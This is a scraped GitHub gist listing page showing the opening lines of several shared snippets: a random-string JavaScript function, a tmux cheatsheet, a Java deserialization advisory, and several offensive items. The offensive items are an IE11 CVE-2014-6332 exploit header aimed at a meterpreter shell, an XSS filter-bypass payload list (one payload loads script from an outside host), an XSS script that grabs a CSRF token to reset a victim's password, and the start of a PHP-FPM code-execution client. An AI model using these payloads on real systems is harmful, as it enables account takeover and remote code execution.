Skip to content

Instantly share code, notes, and snippets.

View l0ca1's full-sized avatar

l0cal l0ca1

View GitHub Profile
@xuanfeng
xuanfeng / randomWord.js
Last active December 8, 2019 09:37
产生任意长度随机字母数字组合
/*
** randomWord 产生任意长度随机字母数字组合
** randomFlag-是否任意长度 min-任意长度最小位[固定位数] max-任意长度最大位
** xuanfeng 2014-08-28
*/
function randomWord(randomFlag, min, max){
var str = "",
range = min,
arr = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];
@worawit
worawit / cve-2014-6332_win7_ie11_poc.html
Last active March 30, 2024 15:03
CVE-2014-6332 PoC to get shell or bypass protected mode
<html>
<head>
<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
- Tested on IE11 + Windows 7 64-bit
References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html
@frohoff
frohoff / JAVA-ADVISORY.md
Last active June 18, 2025 09:27
Java 7u21 Security Advisory

Security Advisory – Java SE

Chris Frohoff – Qualcomm Information Security and Risk Management

Introduction

  • Affected Product(s): Java SE 6, Java SE 7
  • Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
  • Vendor Contact: secalert_us@oracle.com
  • Vulnerability Type: Unsafe Object Deserialization
@ryerh
ryerh / tmux-cheatsheet.markdown
Last active November 3, 2025 02:35 — forked from MohamedAlaa/tmux-cheatsheet.markdown
Tmux 快捷键 & 速查表 & 简明教程

注意:本文内容适用于 Tmux 2.3 及以上的版本,但是绝大部分的特性低版本也都适用,鼠标支持、VI 模式、插件管理在低版本可能会与本文不兼容。

Tmux 快捷键 & 速查表 & 简明教程

启动新会话:

tmux [new -s 会话名 -n 窗口名]

恢复会话:

@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active October 4, 2025 22:33
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@scarvell
scarvell / xss-xhr
Created March 27, 2017 22:27
xss-xhr
<script>
var x = new XMLHttpRequest();
x.open("GET", "/lk", true);
x.onreadystatechange = function() {
if (x.readyState == XMLHttpRequest.DONE) {
text = x.responseText;
text = text.substr(text.indexOf('invisible">') + 'invisible">'.length);
csrf = text.substr(0, text.indexOf('</p>'));
newdata = JSON.stringify({'new_password':'QWERTYqwerty1',confirm_password:'QWERTYqwerty1','token':csrf});
y = new XMLHttpRequest();
@phith0n
phith0n / fpm.py
Last active August 18, 2025 08:04
Fastcgi PHP-FPM Client && Code Execution
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False